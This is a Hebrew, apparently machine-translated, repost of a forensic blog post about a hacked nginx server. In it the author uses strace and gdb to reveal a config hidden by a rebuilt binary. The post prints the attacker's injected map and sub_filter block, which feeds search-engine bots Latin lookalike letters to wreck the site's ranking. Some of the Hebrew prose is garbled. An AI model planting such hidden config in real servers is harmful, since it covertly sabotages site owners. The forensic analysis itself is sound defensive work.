🥇כאשר 'a' אינו שווה ל-'a'. בעקבות פריצה אחת

סיפור לא נעים ביותר קרה לאחד החברים שלי. אבל עד כמה שזה לא נעים עבור מיכאיל, זה היה משעשע עבורי באותה מידה.

אני חייב לומר שהחבר שלי די UNIX-משתמש: יכול להתקין את המערכת בעצמו MySQL, php ולבצע הגדרות פשוטות nginx.
ויש לו תריסר או אחד וחצי אתרים המוקדשים לכלי בנייה.

אחד מהאתרים האלו המוקדשים למסורים שרשרת יושב איתן בטופ של מנועי החיפוש. האתר הזה הוא מבקר לא מסחרי, אבל מישהו התרגל לתקוף אותו. זֶה DDoSואז הם כותבים הערות מגונות ושולחים התעללויות לאירוח ול-RKN.
פתאום הכל נרגע והרוגע הזה התברר כלא טוב, והאתר התחיל לעזוב בהדרגה את השורות העליונות של תוצאות החיפוש.

זו הייתה אמירה, ואז הסיפור של המנהל עצמו.

זה היה לקראת השינה כשהטלפון צלצל: "סן, אתה לא מוכן להסתכל על השרת שלי? נראה לי שפרצו אותי, אני לא יכול להוכיח את זה, אבל התחושה לא עזבה אותי כבר השבוע השלישי. אולי זה בדיוק הזמן שאקבל טיפול בפרנויה?"

לאחר מכן היה דיון של חצי שעה שניתן לסכם כך:

האדמה לפריצה הייתה די פורייה;
תוקף יכול לקבל זכויות משתמש-על;
התקיפה (אם התרחשה) כוונה במיוחד לאתר זה;
אזורים בעייתיים תוקנו ואתה רק צריך להבין אם הייתה חדירה כלשהי;
הפריצה לא יכלה להשפיע על קוד האתר ומסדי הנתונים.

לגבי הנקודה האחרונה.

רק ה-IP הקדמי הלבן משקיף אל העולם. אין החלפה בין ה-backends ל-frontend למעט http(s), המשתמשים/סיסמאות שונים, לא הוחלפו מפתחות. בכתובות אפורות, כל היציאות למעט 80/443 סגורות. כתובות IP backend לבנים ידועות רק לשני משתמשים, אשר מיכאיל סומך עליהם לחלוטין.

מותקן בחזית דביאן 9 ועד שהשיחה מתבצעת, המערכת מבודדת מהעולם על ידי חומת אש חיצונית ונעצרת.

"אוקיי, תן לי גישה," אני מחליט לדחות את השינה לשעה. "אני אראה במו עיני."

כאן ובהמשך:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

מחפש פריצה אפשרית

אני פותח את השרת, ראשון מצב הצלה. אני מעלה את הדיסקים ומדפדף ביניהם אישור-יומנים, היסטוריה, יומני מערכת וכו', אם אפשר, אני בודק את תאריכי יצירת הקובץ, למרות שאני מבין שפצח רגיל היה "נסחף" אחריו, ומישה כבר "דרך" הרבה בזמן שחיפש את עצמו .

אני מתחיל במצב רגיל, עדיין לא ממש מבין מה לחפש, אני לומד את ההגדרות. קודם כל, אני מתעניין nginx מכיוון שבאופן כללי, אין שום דבר אחר בחזית מלבד זה.
ההגדרות קטנות, בנויות היטב לתריסר קבצים, אני פשוט מסתכל דרכם חתול'אה אחד אחד. הכל נראה נקי, אבל אי אפשר לדעת אם פספסתי משהו לכלול, הרשו לי לעשות רשימה מלאה:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

לא הבנתי: "איפה הרישום?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

שאלה שנייה מתווספת לשאלת הרישום: "מדוע גרסה כה עתיקה של nginx?"

בנוסף, המערכת מאמינה שהגרסה העדכנית ביותר מותקנת:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

אני מתקשר:
- מישה, למה הרכבת מחדש nginx?
- רגע, אני אפילו לא יודע איך לעשות את זה!
- טוב, טוב, לך לישון...

nginx ברור שהוא נבנה מחדש והפלט של הרישום באמצעות "-T" מוסתר מסיבה כלשהי. אין יותר ספקות לגבי פריצה ואפשר פשוט לקבל את זה ו(מכיוון שמישה ממילא החליף את השרת בחדש) לשקול את הבעיה כפתורה.

ואכן, מאז שמישהו קיבל את הזכויות שורש'אה, אז זה רק הגיוני לעשות התקנה מחדש של המערכת, והיה חסר תועלת לחפש מה לא בסדר שם, אבל הפעם הסקרנות ניצחה את השינה. איך נוכל לגלות מה הם רצו להסתיר מאיתנו?

בואו ננסה להתחקות אחר:

$ strace nginx -T

אנחנו מסתכלים על זה, ברור שאין מספיק קווים בעקיבה א-לה

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

סתם בשביל הכיף, בואו נשווה את הממצאים.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

אני חושב שזה חלק מהקוד /src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

הובא לטופס:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

או

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

לכן הרישום לפי "-T" אינו מוצג.

אבל איך אנחנו יכולים לראות את התצורה שלנו?

אם המחשבה שלי נכונה והבעיה היא רק במשתנה ngx_dump_config בואו ננסה להתקין אותו באמצעות gdb, למרבה המזל יש מפתח --with-cc-opt -g להציג ולקוות כי אופטימיזציה -O2 זה לא יזיק לנו. יחד עם זאת, כי אני לא יודע איך ngx_dump_config ניתן לעבד ב מקרה 'T':, לא נקרא לחסום זה, אלא נתקין אותו באמצעות מקרה 't':

מדוע אתה יכול להשתמש ב-'-t' כמו גם '-T'עיבוד בלוק if(ngx_dump_config) קורה בפנים if(ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

כמובן, אם הקוד משתנה בחלק זה ולא ב מקרה 'T':, אז השיטה שלי לא תעבוד.

בדוק את nginx.confלאחר שכבר פתר את הבעיה בניסוי, נקבע כי נדרשת תצורה מינימלית כדי שהתוכנה הזדונית תפעל nginx סוּג:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

נשתמש בו לקיצור במאמר.

הפעל את מאתר הבאגים

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

בשלבים הבאים:

הגדר נקודת שבירה בפונקציה עיקרי ()
להפעיל את התוכנית
שנה את הערך של המשתנה שקובע את הפלט של התצורה ngx_dump_config=1
להמשיך/לסיים את התוכנית

כפי שאנו יכולים לראות, התצורה האמיתית שונה משלנו, אנו בוחרים ממנה חלק טפילי:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

בואו נסתכל על מה שקורה כאן לפי הסדר.

נחושים User-Agentשל yandex/google:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

דפי שירות אינם נכללים wordpress:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

ולמי שנכנס לשני התנאים הנ"ל

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

בתוך הטקסט html-דפים משתנים 'או' על 'או' и 'א' על 'א':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

נכון, העדינות היחידה היא זו 'א' != 'א' כמו גם 'o' != 'o':

לפיכך, בוטים של מנועי חיפוש מקבלים, במקום 100% טקסט קירילי רגיל, זבל שונה מדולל בלטינית 'א' и 'או'. אני לא מעז לדון כיצד זה משפיע על קידום אתרים, אבל לא סביר שלבלבול כזה של אותיות תהיה השפעה חיובית על המיקומים בתוצאות החיפוש.

מה אני יכול להגיד, חבר'ה עם דמיון.

תזכור

איתור באגים עם GDB
gdb(1) - דף אדם של לינוקס
strace(1) - דף אדם של לינוקס
Nginx - מודול ngx_http_sub_module
על מסורים, מסורי שרשרת ומסורים חשמליים

מקור: www.habr.com

כאשר 'a' אינו שווה ל-'a'. בעקבות פריצה

מחפש פריצה אפשרית

אבל איך אנחנו יכולים לראות את התצורה שלנו?

תזכור

הוספת תגובה ביטול תגובה